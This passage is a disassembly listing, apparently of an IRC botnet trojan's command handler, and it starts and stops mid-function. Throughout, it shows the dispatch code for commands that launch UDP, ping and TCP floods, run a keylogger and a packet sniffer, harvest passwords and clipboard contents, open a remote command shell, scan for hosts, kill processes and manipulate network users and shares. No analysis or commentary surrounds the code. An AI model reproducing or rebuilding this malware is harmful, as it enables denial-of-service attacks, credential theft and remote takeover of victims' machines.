jmp loc_40EE11
; ---------------------------------------------------------------------------
loc_40A9C2: ; CODE XREF: sub_409806+1178�j
push 8
mov edi, eax
mov esi, offset aThreads ; "threads"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E8A8
push 2
mov edi, eax
mov esi, offset aT ; "t"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E8A8
push 8
mov edi, eax
mov esi, offset aAliases ; "aliases"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E885
push 3
mov edi, eax
mov esi, offset aAl ; "al"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E885
push 4
mov edi, eax
mov esi, offset aLog_0 ; "log"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E792
push 3
mov edi, eax
mov esi, offset aLg ; "lg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E792
push 9
mov edi, eax
mov esi, offset aClearlog ; "clearlog"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E776
push 4
mov edi, eax
mov esi, offset aClg ; "clg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E776
push 8
mov edi, eax
mov esi, offset aNetinfo ; "netinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E73B
push 3
mov edi, eax
mov esi, offset aNi ; "ni"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E73B
push 8
mov edi, eax
mov esi, offset aSysinfo ; "sysinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E70F
push 3
mov edi, eax
mov esi, offset aSi ; "si"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E70F
push 8
mov edi, eax
mov esi, offset aDestroy ; "destroy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E692
push 0Bh
mov edi, eax
mov esi, offset aErradicate ; "erradicate"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E692
push 6
mov edi, eax
mov esi, offset aProcs ; "procs"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E56C
push 3
mov edi, eax
mov esi, offset aPs ; "ps"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E56C
push 7
mov edi, eax
mov esi, offset aUptime ; "uptime"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4E5
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4E5
push 0Ah
mov edi, eax
mov esi, offset aDriveinfo ; "driveinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4C8
push 4
mov edi, eax
mov esi, offset aDrv ; "drv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4C8
push 9
mov edi, eax
mov esi, offset aTestdlls ; "testdlls"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4AF
push 4
mov edi, eax
mov esi, offset aDll ; "dll"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4AF
push 8
mov edi, eax
mov esi, offset aOpencmd ; "opencmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E470
push 5
mov edi, eax
mov esi, offset aOcmd ; "ocmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E470
push 8
mov edi, eax
mov esi, offset aCmdstop ; "cmdstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40ABCA
push [ebp+ebx+var_A0]
push 8
push offset aRemoteShell ; "Remote shell"
push offset aCmd_0 ; "[CMD]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40ABCA: ; CODE XREF: sub_409806+13AA�j
push 4
mov edi, eax
mov esi, offset aWho ; "who"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40AF09
cmp [ebp+var_C], edx
jnz short loc_40ABFD
push edx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40ABFD: ; CODE XREF: sub_409806+13DB�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40AC02: ; CODE XREF: sub_409806+1443�j
cmp byte ptr [edi], 0
lea eax, [edi+1]
jnz short loc_40AC0F
mov eax, offset aEmpty ; "<Empty>"
loc_40AC0F: ; CODE XREF: sub_409806+1402�j
push eax
push esi
lea eax, [ebp+var_2F0]
push offset aD_S ; "%d. %s"
push eax
call sub_416905
push 1
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40AC02
push offset aMainLoginListC ; "[MAIN]: Login list complete."
call sub_401ECD
mov eax, [ebp+var_1C]
pop ecx
loc_40AC59: ; CODE XREF: sub_409806+269E�j
; sub_409806+5625�j
mov ecx, [ebp+ebx+var_94]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_409A84
push 8
mov edi, eax
mov esi, offset aAdvscan ; "advscan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F478
push 4
mov edi, eax
mov esi, offset aAsc ; "asc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F478
push 9
mov edi, eax
mov esi, offset aUdpflood ; "udpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F32F
push 4
mov edi, eax
mov esi, offset aUdp ; "udp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F32F
push 2
mov edi, eax
mov esi, offset aU ; "u"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F32F
push 0Ah
mov edi, eax
mov esi, offset aPingflood ; "pingflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F1F5
push 5
mov edi, eax
mov esi, offset aPing_0 ; "ping"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F1F5
push 2
mov edi, eax
mov esi, offset aP ; "p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F1F5
push 9
mov edi, eax
mov esi, offset aTcpflood ; "tcpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F034
push 4
mov edi, eax
mov esi, offset aTcp ; "tcp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F034
push 6
mov edi, eax
mov esi, offset aEmail ; "email"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40EE3E
mov eax, [ebp+ebx+var_A0]
lea edx, [ebp+var_848]
sub edx, eax
loc_40AD56: ; CODE XREF: sub_409806+1558�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40AD56
push [ebp+ebx+var_9C]
call sub_416C92
mov esi, eax
mov eax, [ebp+ebx+var_98]
lea edx, [ebp+var_1FF0]
pop ecx
sub edx, eax
loc_40AD7E: ; CODE XREF: sub_409806+1580�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40AD7E
mov eax, [ebp+arg_0]
lea edx, [ebp+var_1548]
sub edx, eax
loc_40AD93: ; CODE XREF: sub_409806+1595�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40AD93
push offset asc_422B08 ; " "
push offset a_ ; "_"
push [ebp+ebx+var_90]
call sub_40718D
add esp, 0Ch
lea edx, [ebp+var_1EF0]
loc_40ADBC: ; CODE XREF: sub_409806+15BE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ADBC
lea eax, [ebp+var_1840]
push eax
push 101h
call dword_43A3AC ; WSAStartup
lea eax, [ebp+var_848]
push eax
call dword_43A400 ; gethostbyname
push 6
push 1
push 2
mov ebx, eax
call dword_43A39C ; socket
mov edi, eax
mov [ebp+var_D8], 2
mov eax, [ebx+0Ch]
mov eax, [eax]
mov eax, [eax]
push esi
mov [ebp+var_D4], eax
call dword_43A4F4 ; ntohs
mov [ebp+var_D6], ax
lea eax, [ebp+var_1EF0]
push eax
lea eax, [ebp+var_1FF0]
push eax
lea eax, [ebp+var_1EF0]
push eax
lea eax, [ebp+var_1548]
push eax
lea eax, [ebp+var_1FF0]
push eax
lea eax, [ebp+var_27F0]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_416905
add esp, 1Ch
push 10h
lea eax, [ebp+var_D8]
push eax
push edi
call dword_43A34C ; connect
xor ebx, ebx
push ebx
mov esi, 100h
push esi
lea eax, [ebp+var_1DEC]
push eax
push edi
call dword_43A304 ; recv
lea eax, [ebp+var_1DEC]
lea ecx, [eax+1]
loc_40AE80: ; CODE XREF: sub_409806+167F�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AE80
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_27F0]
push eax
push edi
call dword_43A438 ; send
push ebx
push esi
lea eax, [ebp+var_1DEC]
push eax
push edi
call dword_43A304 ; recv
push edi
call dword_43A4B0 ; closesocket
call dword_43A4BC ; WSACleanup
lea eax, [ebp+var_1548]
push eax
lea eax, [ebp+var_2F0]
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_C], ebx
jnz short loc_40AEF2
push ebx
loc_40AED7: ; CODE XREF: sub_409806+2127�j
; sub_409806+4038�j
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40AEEA: ; CODE XREF: sub_409806+345D�j
call sub_405D20
add esp, 14h
loc_40AEF2: ; CODE XREF: sub_409806+16CE�j
; sub_409806+211F�j ...
mov esi, [ebp+arg_24]
loc_40AEF5: ; CODE XREF: sub_409806+3FCD�j
; sub_409806+3FF0�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
pop ecx
mov eax, esi
jmp loc_409A87
; ---------------------------------------------------------------------------
loc_40AF09: ; CODE XREF: sub_409806+13D2�j
push 8
mov edi, eax
mov esi, offset aGetclip ; "getclip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E42C
push 3
mov edi, eax
mov esi, offset aGc ; "gc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E42C
push 9
mov edi, eax
mov esi, offset aFlusharp ; "flusharp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E401
push 5
mov edi, eax
mov esi, offset aFarp ; "farp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E401
push 9
mov edi, eax
mov esi, offset aFlushdns ; "flushdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E3D1
push 5
mov edi, eax
mov esi, offset aFdns ; "fdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E3D1
push 0Ah
mov edi, eax
mov esi, offset aCurrentip ; "currentip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E397
push 4
mov edi, eax
mov esi, offset aCip ; "cip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E397
push 0Dh
mov edi, eax
mov esi, offset aRloginserver ; "rloginserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E25E
push 7
mov edi, eax
mov esi, offset aRlogin ; "rlogin"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E25E
push 0Bh
mov edi, eax
mov esi, offset aHttpserver ; "httpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E0DD
push 5
mov edi, eax
mov esi, offset aHttp ; "http"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E0DD
push 0Bh
mov edi, eax
mov esi, offset aTftpserver ; "tftpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DF86
push 5
mov edi, eax
mov esi, offset aTftp ; "tftp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DF86
push 9
mov edi, eax
mov esi, offset aFindpass ; "findpass"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DEDE
push 3
mov edi, eax
mov esi, offset aFp ; "fp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DEDE
push 8
mov edi, eax
mov esi, offset aScanall ; "scanall"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBA3
push 3
mov edi, eax
mov esi, offset aSa ; "sa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBA3
mov ecx, [ebp+ebx+var_A0]
test ecx, ecx
mov [ebp+var_8], ecx
jz loc_409A84
push 5
mov edi, eax
mov esi, offset aNick_0 ; "nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB7E
push 2
mov edi, eax
mov esi, offset aN ; "n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB7E
push 5
mov edi, eax
mov esi, offset aJoin ; "join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB5A
push 2
mov edi, eax
mov esi, offset aJ ; "j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB5A
push 5
mov edi, eax
mov esi, offset aPart_0 ; "part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB40
push 3
mov edi, eax
mov esi, offset aPt ; "pt"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB40
push 4
mov edi, eax
mov esi, offset aRaw ; "raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB09
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB09
push 0Bh
mov edi, eax
mov esi, offset aKillthread ; "killthread"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DA4F
push 2
mov edi, eax
mov esi, offset aK ; "k"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DA4F
push 7
mov edi, eax
mov esi, offset aC_quit ; "c_quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D9A1
push 4
mov edi, eax
mov esi, offset aC_q ; "c_q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D9A1
push 0Ah
mov edi, eax
mov esi, offset aC_rndnick ; "c_rndnick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D950
push 5
mov edi, eax
mov esi, offset aC_rn ; "c_rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D950
push 7
mov edi, eax
mov esi, offset aPrefix ; "prefix"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D937
push 3
mov edi, eax
mov esi, offset aPr ; "pr"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D937
push 5
mov edi, eax
mov esi, offset aOpen ; "open"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D901
push 2
mov edi, eax
mov esi, offset aO ; "o"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D901
push 7
mov edi, eax
mov esi, offset aServer ; "server"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D8D8
push 3
mov edi, eax
mov esi, offset aSe ; "se"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D8D8
push 4
mov edi, eax
mov esi, offset aDns ; "dns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D876
push 3
mov edi, eax
mov esi, offset aDn ; "dn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D876
push 9
mov edi, eax
mov esi, offset aKillproc ; "killproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D843
push 3
mov edi, eax
mov esi, offset aKp ; "kp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D843
push 0Ch
mov edi, eax
mov esi, offset aKilldelproc ; "killdelproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D7FB
push 4
mov edi, eax
mov esi, offset aKdp ; "kdp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D7FB
push 5
mov edi, eax
mov esi, offset aKill ; "kill"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D79A
push 3
mov edi, eax
mov esi, offset aKi ; "ki"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D79A
push 7
mov edi, eax
mov esi, offset aDelete ; "delete"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D754
push 4
mov edi, eax
mov esi, offset aDel ; "del"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D754
push 5
mov edi, eax
mov esi, offset aList_0 ; "list"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D734
push 3
mov edi, eax
mov esi, offset aLi ; "li"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D734
push 6
mov edi, eax
mov esi, offset aVisit ; "visit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D642
push 2
mov edi, eax
mov esi, offset aV ; "v"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D642
push 8
mov edi, eax
mov esi, offset aMirccmd ; "mirccmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5C9
push 5
mov edi, eax
mov esi, offset aMirc ; "mirc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5C9
push 4
mov edi, eax
mov esi, offset aCmd ; "cmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D56D
push 3
mov edi, eax
mov esi, offset aCm ; "cm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D56D
push 9
mov edi, eax
mov esi, offset aReadfile ; "readfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D4E2
push 3
mov edi, eax
mov esi, offset aRf ; "rf"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D4E2
push 7
mov edi, eax
mov esi, offset aPsniff ; "psniff"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40B4FB
mov edi, [ebp+var_8]
push 3
mov esi, offset aOn ; "on"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40B4C6
push 19h
call sub_4138A6
test eax, eax
pop ecx
jle short loc_40B3E2
push offset aPsniffAlreadyR ; "[PSNIFF]: Already running."
jmp loc_40B564
; ---------------------------------------------------------------------------
loc_40B3E2: ; CODE XREF: sub_409806+1BD0�j
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
mov [ebp+var_384], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
mov eax, [ebp+var_C]
mov [ebp+var_2F8], eax
jz short loc_40B40C
mov eax, ebx
jmp short loc_40B427
; ---------------------------------------------------------------------------
loc_40B40C: ; CODE XREF: sub_409806+1C00�j
xor ecx, ecx
mov eax, offset aSniffing ; "#sniffing"
inc ecx
mov edi, 422B0Ah
mov esi, eax
xor edx, edx
repe cmpsb
jnz short loc_40B427
mov eax, [ebp+var_9C]
loc_40B427: ; CODE XREF: sub_409806+1C04�j
; sub_409806+1C19�j
push eax
lea eax, [ebp+var_380]
push 80h
push eax
call sub_416B5D
lea eax, [ebp+var_2F0]
push offset aPsniffCarnivor ; "[PSNIFF]: Carnivore packet sniffer acti"...
push eax
call sub_416905
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 19h
push eax
call sub_4136B6
add esp, 20h
mov [ebp+var_300], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_384]
push eax
push offset sub_40913E
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_300]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jz short loc_40B4B5
cmp [ebp+var_2F4], esi
jnz loc_40EDEE
loc_40B49F: ; CODE XREF: sub_409806+1CA8�j
push 32h
call dword_422000 ; Sleep
cmp [ebp+var_2F4], 0
jz short loc_40B49F
jmp loc_40EDEE
; ---------------------------------------------------------------------------
loc_40B4B5: ; CODE XREF: sub_409806+1C8B�j
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aPsniffFailedTo ; "[PSNIFF]: Failed to start sniffer threa"...
jmp loc_40EDDF
; ---------------------------------------------------------------------------
loc_40B4C6: ; CODE XREF: sub_409806+1BC0�j
mov edi, [ebp+var_8]
push 4
mov esi, offset aOff ; "off"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40EDEE
push eax
push 19h
call sub_413859
test eax, eax
pop ecx
pop ecx
jle short loc_40B4F4
push eax
push offset aPsniffCarniv_0 ; "[PSNIFF]: Carnivore stopped. (%d thread"...
jmp loc_40EDDF
; ---------------------------------------------------------------------------
loc_40B4F4: ; CODE XREF: sub_409806+1CE1�j
push offset aPsniffNoCarniv ; "[PSNIFF]: No Carnivore thread found."
jmp short loc_40B564
; ---------------------------------------------------------------------------
loc_40B4FB: ; CODE XREF: sub_409806+1BAB�j
push 7
mov edi, eax
mov esi, offset aKeylog ; "keylog"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40B67E
mov edi, [ebp+var_8]
push 3
mov esi, offset aOn ; "on"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40B577
mov edi, [ebp+var_8]
push 5
mov esi, offset aFile ; "file"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40B577
mov edi, [ebp+var_8]
push 4
mov esi, offset aOff ; "off"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40EDEE
push eax
push 1Bh
call sub_413859
test eax, eax
pop ecx
pop ecx
jle short loc_40B55F
push eax
push offset aKeylogKeyLogge ; "[KEYLOG]: Key logger stopped. (%d threa"...
jmp loc_40EDDF
; ---------------------------------------------------------------------------
loc_40B55F: ; CODE XREF: sub_409806+1D4C�j
push offset aKeylogNoKeyLog ; "[KEYLOG]: No key logger thread found."
loc_40B564: ; CODE XREF: sub_409806+1BD7�j
; sub_409806+1CF3�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_416905
pop ecx
pop ecx
jmp loc_40EDEE
; ---------------------------------------------------------------------------
loc_40B577: ; CODE XREF: sub_409806+1D18�j
; sub_409806+1D29�j
push 1Bh
call sub_4138A6
test eax, eax
pop ecx
jle short loc_40B58A
push offset aKeylogAlreadyR ; "[KEYLOG]: Already running."
jmp short loc_40B564
; ---------------------------------------------------------------------------
loc_40B58A: ; CODE XREF: sub_409806+1D7B�j
mov eax, [ebp+arg_4]
mov edi, [ebp+var_8]
mov [ebp+var_384], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
push 5
mov esi, offset aFile ; "file"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B5B9
mov [ebp+var_2F8], 1
jmp short loc_40B5C2
; ---------------------------------------------------------------------------
loc_40B5B9: ; CODE XREF: sub_409806+1DA5�j
mov eax, [ebp+var_C]
mov [ebp+var_2F8], eax
loc_40B5C2: ; CODE XREF: sub_409806+1DB1�j
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40B5D1
mov eax, ebx
jmp short loc_40B5EC
; ---------------------------------------------------------------------------
loc_40B5D1: ; CODE XREF: sub_409806+1DC5�j
xor ecx, ecx
mov eax, offset aHell_1 ; "#hell"
inc ecx
mov edi, 422B0Ah
mov esi, eax
xor edx, edx
repe cmpsb
jnz short loc_40B5EC
mov eax, [ebp+var_9C]
loc_40B5EC: ; CODE XREF: sub_409806+1DC9�j
; sub_409806+1DDE�j
push eax
lea eax, [ebp+var_37C]
push 80h
push eax
call sub_416B5D
lea eax, [ebp+var_2F0]
push offset aKeylogKeyLog_0 ; "[KEYLOG]: Key logger active."
push eax
call sub_416905
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Bh
push eax
call sub_4136B6
add esp, 20h
mov [ebp+var_380], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_384]
push eax
push offset sub_405ED4
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_380]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40B671
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aKeylogFailedTo ; "[KEYLOG]: Failed to start logging threa"...
jmp loc_40EDDF
; ---------------------------------------------------------------------------
loc_40B669: ; CODE XREF: sub_409806+1E71�j
push 32h
call dword_422000 ; Sleep
loc_40B671: ; CODE XREF: sub_409806+1E50�j
cmp [ebp+var_2F4], esi
jz short loc_40B669
jmp loc_40EDEE
; ---------------------------------------------------------------------------
loc_40B67E: ; CODE XREF: sub_409806+1D03�j
push 4
mov edi, eax
mov esi, offset aNet ; "net"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40B932
xor eax, eax
cmp dword_43A508, eax
jz short loc_40B6AE
cmp dword_43A530, eax
jz short loc_40B6AE
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_40B913
; ---------------------------------------------------------------------------
loc_40B6AE: ; CODE XREF: sub_409806+1E94�j
; sub_409806+1E9C�j
cmp [ebp+var_14], eax
jz loc_40B921
mov eax, [ebp+ebx+var_9C]
and [ebp+arg_0], 0
test eax, eax
mov [ebp+var_10], eax
jz short loc_40B6D7
push eax
push [ebp+var_14]
call sub_4173D0
pop ecx
pop ecx
mov [ebp+arg_0], eax
loc_40B6D7: ; CODE XREF: sub_409806+1EC1�j
mov edx, [ebp+var_8]
push 6
mov edi, edx
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B745
cmp [ebp+var_10], eax
jz short loc_40B713
push [ebp+arg_0]
push 3
loc_40B6F4: ; CODE XREF: sub_409806+1F54�j
; sub_409806+1F6B�j ...
call sub_4082A9
push eax
lea eax, [ebp+var_2F0]
push offset aS_3 ; "%s"
push eax
call sub_416905
add esp, 14h
jmp loc_40B921
; ---------------------------------------------------------------------------
loc_40B713: ; CODE XREF: sub_409806+1EE7�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4079E4
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40B73B
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40B919
; ---------------------------------------------------------------------------
loc_40B73B: ; CODE XREF: sub_409806+1F29�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40B919
; ---------------------------------------------------------------------------
loc_40B745: ; CODE XREF: sub_409806+1EE2�j
push 5
mov edi, edx
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B75C
push [ebp+arg_0]
push 4
jmp short loc_40B6F4
; ---------------------------------------------------------------------------
loc_40B75C: ; CODE XREF: sub_409806+1F4D�j
push 6
mov edi, edx
mov esi, offset aPause ; "pause"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B773
push [ebp+arg_0]
push 5
jmp short loc_40B6F4
; ---------------------------------------------------------------------------
loc_40B773: ; CODE XREF: sub_409806+1F64�j
push 9
mov edi, edx
mov esi, offset aContinue ; "continue"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B78D
push [ebp+arg_0]
push 6
jmp loc_40B6F4
; ---------------------------------------------------------------------------
loc_40B78D: ; CODE XREF: sub_409806+1F7B�j
push 7
mov edi, edx
mov esi, offset aDelete ; "delete"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B7A7
push [ebp+arg_0]
push 1
jmp loc_40B6F4
; ---------------------------------------------------------------------------
loc_40B7A7: ; CODE XREF: sub_409806+1F95�j
push 6
mov edi, edx
mov esi, offset aShare ; "share"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B82B
cmp [ebp+var_10], eax
jz short loc_40B7F7
cmp [ebp+var_38C], al
jz short loc_40B7CC
push eax
push [ebp+var_10]
push 1
jmp short loc_40B7D8
; ---------------------------------------------------------------------------
loc_40B7CC: ; CODE XREF: sub_409806+1FBC�j
push [ebp+ebx+var_98]
push [ebp+var_10]
push 0
loc_40B7D8: ; CODE XREF: sub_409806+1FC4�j
call sub_408321
push eax
lea eax, [ebp+var_2F0]
push offset aS_3 ; "%s"
push eax
call sub_416905
add esp, 18h
jmp loc_40B921
; ---------------------------------------------------------------------------
loc_40B7F7: ; CODE XREF: sub_409806+1FB4�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4083DF
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40B821
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40B919
; ---------------------------------------------------------------------------
loc_40B821: ; CODE XREF: sub_409806+200F�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40B919
; ---------------------------------------------------------------------------
loc_40B82B: ; CODE XREF: sub_409806+1FAF�j
push 5
mov edi, edx
mov esi, offset aUser ; "user"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40B8C7
cmp [ebp+var_10], eax
jz short loc_40B899
cmp [ebp+var_38C], al
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
jz short loc_40B860
push eax
push [ebp+var_10]
push 1
jmp short loc_40B87A
; ---------------------------------------------------------------------------
loc_40B860: ; CODE XREF: sub_409806+2050�j
mov ebx, [ebp+ebx+var_98]
test ebx, ebx
jz short loc_40B873
push ebx
push [ebp+var_10]
push 0
jmp short loc_40B87A
; ---------------------------------------------------------------------------
loc_40B873: ; CODE XREF: sub_409806+2063�j
push 0
push [ebp+var_10]
push 2
loc_40B87A: ; CODE XREF: sub_409806+2058�j
; sub_409806+206B�j
call sub_4084FE
push eax
lea eax, [ebp+var_2F0]
push offset aS_3 ; "%s"
push eax
call sub_416905
add esp, 24h
jmp loc_40B921
; ---------------------------------------------------------------------------
loc_40B899: ; CODE XREF: sub_409806+203C�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4085C8
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40B8C0
push offset aNetUserListCom ; "[NET]: User list completed."
jmp short loc_40B919
; ---------------------------------------------------------------------------
loc_40B8C0: ; CODE XREF: sub_409806+20B1�j
push offset aNetUserListFai ; "[NET]: User list failed."
jmp short loc_40B919
; ---------------------------------------------------------------------------
loc_40B8C7: ; CODE XREF: sub_409806+2033�j
push 5
mov edi, edx
mov esi, offset aSend ; "send"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B90E
cmp [ebp+var_10], eax
jz short loc_40B907
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4081ED
push eax
lea eax, [ebp+var_2F0]
push offset aS_3 ; "%s"
push eax
